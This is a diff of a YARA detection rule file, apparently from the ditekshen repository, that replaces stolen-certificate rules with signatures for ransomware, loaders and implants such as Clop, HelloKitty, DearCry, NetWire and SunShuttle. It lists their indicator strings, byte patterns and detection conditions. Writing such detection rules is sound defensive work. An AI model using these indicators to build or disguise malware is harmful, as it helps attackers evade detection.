+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6957-L6972"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4783-L4805"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "292657717cb42835324b6ff42d563bca47e042e82afef24b5d666b16979b8103"
+		logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "de7794505df4aeb1253500617e812f462592e163"
-		hash1 = "df3dabd031184b67bab7043baaae17061c21939d725e751c0a6f6b7867d0cf34"
-		importance = 20
+
+	strings:
+		$x1 = "SOFTWARE\\NetWire" fullword ascii
+		$x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 }
+		$s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s2 = "filenames.txt" fullword ascii
+		$s3 = "GET %s HTTP/1.1" fullword ascii
+		$s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii
+		$s5 = "Host.exe" fullword ascii
+		$s6 = "-m \"%s\"" fullword ascii
+		$g1 = "HostId" fullword ascii
+		$g2 = "History" fullword ascii
+		$g3 = "encrypted_key" fullword ascii
+		$g4 = "Install Date" fullword ascii
+		$g5 = "hostname" fullword ascii
+		$g6 = "encryptedUsername" fullword ascii
+		$g7 = "encryptedPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DYNAMX BUSINESS GROUP LTD." and ( pe.signatures [ i ] . serial == "94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" or pe.signatures [ i ] . serial == "00:94:5a:aa:c2:7e:7d:6d:81:0c:0a:54:2b:ed:d5:62:a4" ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( all of ( $g* ) and ( 2 of ( $s* ) or 1 of ( $x* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6D450Cc59Acdb4B7 : FILE
+rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BreakStaf ransomware"
 		author = "ditekSHen"
-		id = "845e3f48-5660-525e-bd18-5953c64322f1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6974-L6985"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4807-L4827"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8328159dce3586c26b777f92d7a87e0660520cf08d122505d34ed427bdd7ff6f"
+		logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "bd3ac678cabb6465854880dd06b7b6cd231def89"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Program files" wide
+		$s2 = "C:\\Program files (x86)" wide
+		$s3 = "C:\\System Volume Information" wide
+		$s4 = "C:\\$Recycle.Bin" wide
+		$s5 = "C:\\Windows" wide
+		$s6 = ".?AVRandomNumberGenerator@Crypto" ascii
+		$s7 = ".?AV?$SymmetricCipherFinal@" ascii
+		$s8 = ".breakstaf" fullword wide nocase
+		$s9 = "readme.txt" fullword wide nocase
+		$s10 = ".VHD" fullword wide nocase
+		$s11 = ".vhdx" fullword wide nocase
+		$s12 = ".BAK" fullword wide nocase
+		$s13 = ".BAC" fullword wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CancellationTokenSource" and pe.signatures [ i ] . serial == "6d:45:0c:c5:9a:cd:b4:b7" )
+		uint16( 0 ) == 0x5a4d and 12 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_66390Fc17786D4A342F0Ee89996D6522 : FILE
+rule DITEKSHEN_MALWARE_Win_Kitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HelloKitty ransomware, triggers on FIVEHANDS"
 		author = "ditekSHen"
-		id = "202e4270-9b49-5516-8188-a64bd528a9c4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4147294a-7eff-595a-ad4f-8a84ffff960f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6987-L6998"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4829-L4847"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a38d09beee8ddaa6e8273e04fe3c5cc9ff9a4e55344e2b9191bb3e5928e9e79b"
+		logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "80e8620ff16598cc1e157a2b7df17d528b03b6e5"
-		importance = 20
+
+	strings:
+		$s1 = "Kitty" wide
+		$s2 = "-path" fullword wide
+		$s3 = "select * from Win32_ShadowCopy" fullword wide
+		$s4 = "Win32_ShadowCopy.ID='%s'" fullword wide
+		$s5 = "programdata" fullword wide
+		$s6 = "$recycle.bin" fullword wide
+		$s7 = ".crypt" fullword wide
+		$s8 = "%s/secret/%S" wide
+		$s9 = "decrypts3nln3tic.onion" wide
+		$n1 = "read_me_lkd.txt" wide
+		$n2 = "DECRYPT_NOTE.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logitech Z-" and pe.signatures [ i ] . serial == "66:39:0f:c1:77:86:d4:a3:42:f0:ee:89:99:6d:65:22" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 1 of ( $n* ) and 4 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D1737E5A94D2Aff121163Df177Ed7Cf7 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects delf downloader agent"
 		author = "ditekSHen"
-		id = "92ba22ba-9610-5b9b-9075-1da84fb148c1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a45afe84-15ae-528a-ad7e-ab9f03045789"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7000-L7015"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4849-L4867"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7889e42ca0bc6c4aad0c7cf90459958e9d256b984fae719bd418fc17120cb4a2"
+		logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed2e4f72e8cb9b008a28b31de440f024381e4c8d"
-		hash1 = "66dfb7c408d734edc2967d50244babae27e4268ea93aa0daa5e6bbace607024c"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii
+		$s2 = "SOFTWARE\\Borland\\Delphi" ascii
+		$s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii
+		$o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 }
+		$o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 }
+		$o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e }
+		$o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 }
+		$o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 }
+		$o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff }
+		$x1 = "22:40:08        \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii
+		$x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BedstSammen ApS" and ( pe.signatures [ i ] . serial == "d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" or pe.signatures [ i ] . serial == "00:d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" ) )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $s* ) and 5 of ( $o* ) ) or ( all of ( $s* ) and 2 of ( $o* ) ) or ( all of ( $x* ) and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5Aa94583A95D42F1 : FILE
+rule DITEKSHEN_MALWARE_Win_Clop : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Clop ransomware variants"
 		author = "ditekSHen"
-		id = "a77e58c7-c613-5416-9bcd-336c036d99bd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d3c9e950-8b03-5d19-8448-9cf208813df2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7017-L7028"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4869-L4889"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "174ce032fd87028e34843417d5a4695d6d6e2eb444095e005588f1acf291cdf8"
+		logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0b27715d7c78368bca3ac0bb829a7ceb19b3b5c3"
-		importance = 20
+
+	strings:
+		$x1 = "Cllp^_-" ascii
+		$s2 = "temp.dat" fullword wide
+		$s3 = "README_README.txt" wide
+		$s4 = "BEGIN PUBLIC KEY" ascii
+		$s5 = "runrun" wide
+		$s6 = "wevtutil.exe" ascii
+		$s7 = "%s%s.Cllp" fullword wide
+		$s8 = "WinCheckDRVs" fullword wide
+		$o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 }
+		$o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 }
+		$o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 }
+		$o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 }
+		$o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UInt32" and pe.signatures [ i ] . serial == "5a:a9:45:83:a9:5d:42:f1" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $s* ) or 4 of ( $o* ) ) ) or ( all of ( $o* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 4 of ( $o* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_6Ce7A0C62F27Fa98F78853E1Ad11173F : FILE
+rule DITEKSHEN_MALWARE_Win_Maktub : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Maktub ransomware"
 		author = "ditekSHen"
-		id = "dd6ba685-deac-5ba0-8268-2ff17f3efc5a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "be47d858-8497-593f-865b-c3d3a5db6c2e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7030-L7041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4891-L4905"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48692213d57293d28d0eb146d24036fa7e7357e55df07330d596a51a0665f063"
+		logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "638dc7cd59f1d634c19e4fc2c41b38ae08a1d2e5"
-		importance = 20
+
+	strings:
+		$s1 = "Content-Disposition: attachment; filename=" ascii
+		$s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii
+		$s3 = "/tor/status-vote/current/consensus" ascii
+		$s4 = "/tor/server/fp/" ascii
+		$s5 = "/tor/rendezvous2/" ascii
+		$s6 = "404 Not found" fullword ascii
+		$s7 = /_request@\d+/ fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32( 0 ) == 0xe011cfd0 ) and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D&K ENGINEERING" and pe.signatures [ i ] . serial == "6c:e7:a0:c6:2f:27:fa:98:f7:88:53:e1:ad:11:17:3f" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_670C3494206B9F0C18714Fdcffaaa42F : FILE
+rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "cbe10923-794e-50f0-bcc7-026ca2235836"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7043-L7054"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4907-L4920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5215f3e877ac4b37d33a29f9d2e92567db02f41f5fa1592d2de199ee06b43885"
+		logic_hash = "7dd377f6a1cc48ef8ab9d53989755fb967c89d3798b721781bc09043ba3d86f4"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "59612473a9e23dc770f3a33b1ef83c02e3cfd4b6"
-		importance = 20
+		tags = ""
+
+	strings:
+		$rp1 = "GetType('RunPe.RunPe'" ascii
+		$rp2 = "GetType(\"RunPe.RunPe\"" ascii
+		$rm1 = "GetMethod('Run'" ascii
+		$rm2 = "GetMethod(\"Run\"" ascii
+		$s1 = ".Invoke(" ascii
+		$s2 = "[Reflection.Assembly]::Load(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" )
+		all of ( $s* ) and 1 of ( $rp* ) and 1 of ( $rm* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5F11C47D3F8C468E5D38279De98078Ce : FILE
+rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe02
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "d7ec5ceb-df6d-518c-977d-84ab2a40f6ed"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "08261054-bebc-58fe-949a-27f6e817003a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7056-L7067"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4922-L4934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "82db6d0b96303be79aa9a0980a4ce491a1216adbba65443e8e59c5cf69a4a1e4"
+		logic_hash = "d7677689938d3e3eb6b59b99b7e347c60214f6edf8e5f83bf85da5a5f1ad33bb"
 		score = 75
 		quality = 75
-		tags = "FILE"
-		thumbprint = "29bbee51837dbc00c8e949ff2c0226d4bbb3722c"
-		importance = 20
+		tags = ""
+
+	strings:
+		$s1 = "'.Replace('" ascii nocase
+		$s2 = "'aspnet_compiler.exe'" ascii
+		$s3 = "[Byte[]]$" ascii
+		$pe1 = "(77,90," ascii
+		$pe2 = "='4D5A" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atera Networks LTD." and pe.signatures [ i ] . serial == "5f:11:c4:7d:3f:8c:46:8e:5d:38:27:9d:e9:80:78:ce" )
+		all of ( $s* ) and ( #pe1 > 1 or #pe2 > 1 ) and #s1 > 4
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bdb99D5Ecf8271D48E35F1039C2160Ef : FILE
+rule DITEKSHEN_MALWARE_Win_Peloader_Runpe : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PE loader / injector. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "a87a3295-fbdb-5501-97a1-7cb23009f925"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "262dedee-05d2-5783-b0ff-24470d310ab8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7069-L7083"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4936-L4950"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a7fd1705d440306e7643167f46b0735bedab291e714cd01068be321f489e3f3"
+		logic_hash = "0369c3e2f83a0265c81e5dcd10b4d88753bd6ce3da4bb893a364486712a2b80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "331f96a1a187723eaa5b72c9d0115c1c57f08b66"
-		importance = 20
+
+	strings:
+		$s1 = "commandLine'" fullword ascii
+		$s2 = "RunPe.dll" fullword ascii
+		$s3 = "HandleRun" fullword ascii
+		$s4 = "inheritHandles" fullword ascii
+		$s5 = "BlockCopy" fullword ascii
+		$s6 = "WriteProcessMemory" fullword ascii
+		$s7 = "startupInfo" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gavrilov Andrei Alekseevich" and ( pe.signatures [ i ] . serial == "bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" or pe.signatures [ i ] . serial == "00:bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_025020668F51235E9Ecfff8Cf00Da63E : FILE
+rule DITEKSHEN_MALWARE_Win_Peloader_INF : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PE loader / injector. Potentical HCrypt. Observed Gorgon TTPs"
 		author = "ditekSHen"
-		id = "5b9af281-09b0-5df5-af3b-4868a7243636"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "09823302-34e0-5283-9740-1475ab8077be"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7085-L7096"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4952-L4963"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c99caf6ada228fe1229ea8e8ca0b160468f044a9a1e13ed9a83c12afeae337a1"
+		logic_hash = "758f7b465b8f9dab5c1194bee266392efe143ac219a5307e6886845b3c862700"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59f82837fa672a81841d8fa4d3ba290395c10200"
-		importance = 20
+
+	strings:
+		$x1 = "Managament.inf" fullword ascii
+		$x2 = "rOnAlDo" fullword ascii
+		$x3 = "untimeResourceSet" fullword ascii
+		$x4 = "3System.Resources.Tools.StronglyTypedResourceBuilder" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Knassar DK ApS" and pe.signatures [ i ] . serial == "02:50:20:66:8f:51:23:5e:9e:cf:ff:8c:f0:0d:a6:3e" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Cfae7E6F538B9F2E : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent08 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects known downloader agent downloading encoded binaries in patches"
 		author = "ditekSHen"
-		id = "c144fe64-ad45-5ac6-b2ee-904a66230674"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e3450f93-7c57-5386-a901-bc5e710657a4"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7098-L7112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4965-L4975"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23032d387bbfc81edb08982a196b90a136faf935d74c46771c59ef19095ac3a4"
+		logic_hash = "0238c13b00e5778ef216b4e8576c321803da6e269c96c3051b9cc45a3ac6e567"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "3152fc5298e42de08ed2dec23d8fefcaa531c771"
-		importance = 20
+		snort2_sid = "920122"
+		snort3_sid = "920119"
+
+	strings:
+		$pat = /\/base\/[A-F0-9]{32}\.html/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SequenceDesigner" and ( pe.signatures [ i ] . serial == "cf:ae:7e:6f:53:8b:9f:2e" or pe.signatures [ i ] . serial == "00:cf:ae:7e:6f:53:8b:9f:2e" ) )
+		uint16( 0 ) == 0x5a4d and $pat and #pat > 1
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bc9B800F480691Bd6B60963466B0C75 : FILE
+rule DITEKSHEN_MALWARE_Win_Doejocrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DoejoCrypt / DearCry ransomware"
 		author = "ditekSHen"
-		id = "ff76c8b3-8120-54ed-90e1-3ee01e57895e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2c90f8e7-ced4-56da-ab8d-61b5ba63dacd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7114-L7125"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4977-L4993"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15143a6dc374f22252880ce61a419df46d81bc1ee99a29d03a61348f9c230064"
+		logic_hash = "f8a3897de9522340799a59e3e755c323b0defaab73a9030b6b69a1a82c05dcd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8b6c4fc3d54f41ac137795e64477491c93bdf7f1"
-		importance = 20
+
+	strings:
+		$s1 = "DEARCRY!" fullword ascii
+		$s2 = ".CRYPT" fullword ascii
+		$s3 = "\\EncryptFile -svcV2\\" ascii
+		$s4 = "please send me the following hash!" ascii
+		$s5 = "dear!!!" fullword ascii
+		$s6 = "/readme.txt" fullword ascii
+		$o1 = { c3 8b 65 e8 c7 45 fc fe ff ff ff 8b b5 f4 e9 ff }
+		$o2 = { 0f 8c 27 ff ff ff 33 db 57 e8 7b 36 00 00 eb 0a }
+		$o3 = { 0f 8c 2a ff ff ff 53 57 e8 b7 42 00 00 8b 4c 24 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" )
+		uint16( 0 ) == 0x5a4d and 4 of ( $s* ) or ( all of ( $o* ) and ( 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_69Ad1E8B5941C93D5017B7C3Fdb8E7B6 : FILE
+rule DITEKSHEN_MALWARE_Win_Sunshuttle : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SunShuttle / GoldMax"
 		author = "ditekSHen"
-		id = "4b961b30-dc0d-513c-8a66-ed8fe71f5439"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1618d0bc-6e72-5f1e-81e7-56611bfd7f8b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7127-L7138"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4995-L5017"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1a37133dcc7af9c3f229f517dca847d7c007b8a2fdc6af50721d68f68c5d9c20"
+		logic_hash = "fa8feb069e73aa0a7fcb4daecc1fdf8edeff65e5aeefef161626647fe989e5c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9b6f3b3cd33ae938fbc5c95b8c9239bac9f9f7bf"
-		importance = 20
+
+	strings:
+		$s1 = "main.beaconing" fullword ascii
+		$s2 = "main.clean_file" fullword ascii
+		$s3 = "main.decrypt" fullword ascii
+		$s4 = "main.define_internal_settings" fullword ascii
+		$s5 = "main.delete_empty" fullword ascii
+		$s6 = "main.encrypt" fullword ascii
+		$s7 = "main.false_requesting" fullword ascii
+		$s8 = "main.removeBase64Padding" fullword ascii
+		$s9 = "main.resolve_command" fullword ascii
+		$s10 = "main.retrieve_session_key" fullword ascii
+		$s11 = "main.save_internal_settings" fullword ascii
+		$s12 = "main.send_command_result" fullword ascii
+		$s13 = "main.send_file_part" fullword ascii
+		$s14 = "main.wget_file" fullword ascii
+		$s15 = "main.write_file" fullword ascii
 
 	condition:
